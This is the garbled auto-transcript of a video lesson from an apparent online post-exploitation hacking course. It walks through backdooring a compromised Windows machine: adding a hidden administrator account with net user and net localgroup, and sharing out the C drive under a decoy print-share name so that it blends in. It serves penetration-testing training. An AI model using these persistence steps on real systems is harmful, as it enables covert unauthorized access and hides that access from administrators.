Time
7 hours 47 minutes
Difficulty
Advanced
CEU/CPE
10

Video Description

This lesson discusses creating a user, creating permissions and sharing out a drive in Windows. Participants learn step by step instructions in how to create a new user account and obtain information using the newuser command.

Video Transcription

00:04
Hello, ladies and gentlemen, and welcome to the post exploitation, hacking, persistence and continued access course
00:10
in this class, we're going to be discussing the second stage or three stage process, which is actual persistence and back adoring.
00:18
This is going to be the big one for Windows.
00:21
Well, one of the really big ones for Windows
00:24
in that it is going to be discussing actually creating a new user and actually making that user sort of consistent access point for you.
00:34
Um,
00:35
part of this is going to involve actually creating user setting permissions making sort of blend in
00:40
part of it's going to include
00:43
actually sharing out a drive so you can access it as that user
00:48
and just sort of finding the permissions you can give the user if you've exploited in, is an administrator or
00:53
in some way escalated your privileges to those of an administrator, that's going to be a great starting point. It will be
01:00
sort of hard to do this otherwise,
01:04
particularly on a window seven machine or a newer box.
01:08
But where, as as always, we're going to be operating under the assumption that you're a fantastic, super elite hacker, and you exploited your way in is admin. And you've taken over the machine.
01:19
So
01:21
with that ah, perhaps slightly hopeful thought in mind. We're gonna dig right in.
01:26
So in order to do this properly, we're gonna have to have a return of our old friend net. In this case, we're gonna be using that user.
01:34
So you see these user accounts exist. Remember that there was a count one account to account three ASP. Net and Perry.
01:41
So
01:44
let's see what we can do with this user thing.
01:45
Okay?
01:47
That's certainly our current step. We wanna add a user.
01:51
Syntax is net user user name, and then we've got a password.
01:56
Um,
01:57
it has to set, you know, that has toe. Aah!
02:02
Follow certain requirements.
02:06
But if you remember back, we saw already in our information gathering that in that accounts, the password length and password requirements are pretty non existent.
02:15
Um,
02:15
so we're gonna add the user. We're going to try
02:20
to do some fun stuff with that user
02:22
later on. But first up, being first up
02:24
pretty easy. One we're gonna do Net user ad
02:29
user name is going to be a count
02:34
four.
02:35
Easy is that,
02:37
uh
02:38
if you want to give it a password, just for safety's sake again, this is a reminder from earlier because a lot of the back door and we've been doing, we haven't done anything that requires a password.
02:46
We're doing it that way because this is a basic class. However, if you're actually doing a full on Penn test for a course or for a company, you need to remember to always have some form of authentication for your back doors. If it's on a production network and someone else could get access to it,
03:02
you need to make sure they have to pass word authenticate. Yes, I know you did. Just exploit your own way in, but make them do the hard work, too. If you leave open a back door with North vacation and they come in and take everything,
03:15
you're gonna be in trouble.
03:16
So
03:20
that user ad account for
03:22
And if you want to do a password, weaken, say insecure password. Nice, strong, terrible password.
03:30
And it says the passwords really long and Windows doesn't think you can handle that. That's okay, cause it's a little bit after Windows 2000.
03:38
All right, command completed successfully Let's see if it's telling truth.
03:42
I look at that account for
03:45
so now we have an account for it exists. It's something we could work with. The thing in the world has got a password and everything,
03:53
but
03:53
what is account for, actually Ah, what do
04:00
what groups is that a part of? How do we find that out? I just typed in the Net Local group command. That's actually not quite right.
04:06
We can actually check that help user and see if we might be able to find it there.
04:12
See, there's lots of interesting nonsense here that we already looked at.
04:15
We don't see a group's list. Okay, well,
04:19
where would it be? The long and short of it is We actually do use what we do, use that local group,
04:27
but we don't actually use it
04:30
by itself. We actually want to go through and see what accounts we want to put this guy in. Right now, he doesn't have any special groups, so we see things that we want him on. Definitely one of the administrators.
04:41
Home years just might not be bad.
04:44
Remote desktop users means he's someone who's allowed to create a remote desktop.
04:48
Okay.
04:49
And of course, users will probably already be in
04:56
sure is.
04:57
So let's change that
04:59
net local group
05:00
that local group administrators
05:05
ad
05:08
Thank you before
05:11
that local group
05:14
administrators, Since I can type it. There we go. So you count one account Foreign Perry. So now we know going into it that Perry and account one. We're both admin accounts capable of doing fancy stuff
05:26
that'll be useful going forward. We also see the Count Fours in there, and it blends in pretty well
05:30
sit down. Account for is a local admen,
05:33
so we've just got to go ahead, do the same thing,
05:38
adding a count for two
05:40
remote
05:42
desktop users.
05:45
Um,
05:46
let's see who's in home users before we go out into it.
05:53
Okay, we see that their admin accounts and it would make sense for this guy to, ah,
05:58
show up in that one.
06:00
So we add account for
06:02
All right, So now this admin account, this random account four looks just like an admin account. It's in the same groups as privileges. It's important.
06:12
Ah, that means that this account could also, you know,
06:15
actually execute things and actually accomplish goals.
06:19
So with that in mind.
06:21
We can go ahead and say something along the lines of run ***
06:27
we see run as
06:30
needs a user, that user name and then the program that we actually execute and then profile actually load that user's profile. But that's default, so I don't really have to worry about it.
06:40
So
06:42
we go ahead and do
06:44
run as user
06:46
account. Four.
06:48
Cmd
06:49
Let me enter Password, Remember, is insecure
06:53
password
06:55
one.
06:57
It spits out of command. Prompt.
06:59
You see that we're in C Windows some 32. That's an administrator.
07:03
That's a power That means we've come in is an administrator. We've come in doing administrator E things. Obviously we were already is an administrator, But
07:13
that's in the case that we came in. We found ourselves with a command prompts that wasn't doing us any good.
07:18
For example, the netapp that we did earlier
07:21
or something along those lines. We now have an actual good command from one that could be useful to us, and one that we know
07:30
belongs to a user with all the admin privileges.
07:32
But what can we do? Is madman One of the things I mentioned the beginning of the video is one of the things that's going to be most useful.
07:39
And that's going to be the ability to actually share out drives
07:43
to do that.
07:45
It's pretty straightforward. We're gonna do the net share. We see what we've got shared right now. You see? You know, sharing a bunch of files we're gonna do net help, share
07:53
and see
07:55
what commands they entered. Share those files. And what commands were going entered.
07:59
So back up here at the very top, you see? Not Sher Sher Name?
08:03
Sure. Damocles Dr Path.
08:05
Okay, lets try. Oh, and then we're gonna want to use this grant user read Change full
08:13
just so that we could make sure are important. User has everything needs Sonett share
08:20
for share name. We want to look back up. What we saw here we see
08:24
print share I p c share users Kodak.
08:28
So maybe something along the lines of
08:33
Kodak administration
08:37
equals C
08:41
and Grant
08:43
count one. Our account. Four other. Almost a bad thing.
08:48
Comma,
08:52
huh?
08:56
Oh,
08:56
did something bad there.
09:00
First they ended. Bowers did badly with spell administration.
09:05
Okay, Not Sher Sher name. You will see.
09:09
Oh, yeah, I forgot my colon. Never forget your colon.
09:15
It's very painful thing you forget.
09:16
There we go.
09:18
So we're going to do another net share and see if it's been shared out properly. And look at that. Kodak administration
09:24
shared out to sea.
09:26
Who in the world would suspect that? And yet again, we've been looking around, and because of that, we're able to blend in and look like just another one of the many print chairs that are up.
09:35
But
09:35
it's sharing at the C drive,
09:37
and it's got full access for the account for past for the if account for just in case
09:43
that was already going to be a default. But it's still good to know the grant in case you've got it.
09:48
A network account, but not an actual account on this local machine.
09:54
So now that shared out, you've got the user account created.
09:58
I got all the groups added,
10:00
and you've pretty much got access to this machine forever. Unless someone comes through and actually sees the account, which again, we specifically did.
10:07
I count four because it doesn't really come across as anything. We could have done any name, obviously, but account for in this machine blends in with the syntax
10:16
and is pretty hard to pick out unless you already knew for sure. How many accounts were all
10:22
very few people know how many accounts are on even people who are security conscious enough to say,
10:26
You know, obviously the names in such a manner are generally not going to be checking it every day. This machine's been up for a while.
10:33
You probably won't remember.
10:35
So there you go. This is a really good way to backdoor a computer because it's a really difficult way to know.
10:41
And because it tends to give you better long term access now, not only do you have external access through exploits or however you got in the first place us of internal access, you could walk up to this machine and just
10:54
enter into the account.
10:56
Obviously, this was a domain controller. If this was the domain list, you'd be able to actually access any computer on the network as an administrator,
11:03
and you pretty much owned their systems. Now
11:07
with that, I think we're gonna go ahead and this video, as I mentioned, this is one of the most important Windows video, so I really hope you take your time and
11:15
play with these commands and really get used to using them in a bit of a hurry and using them effectively so that you can create users and you can hide yourself. And you could just, generally speaking,
11:26
be the best relief hacker you could be.
11:28
I'll see you next time. Until then, I've been your Smee, Joseph Perry, and you've been watching us on cyber readout. I t.

Up Next

Post Exploitation Hacking

In this self-paced online training course, you will cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting.

Instructed By

Instructor Profile Image
Joe Perry
Senior Technical Instructor at FireEye, Inc
Instructor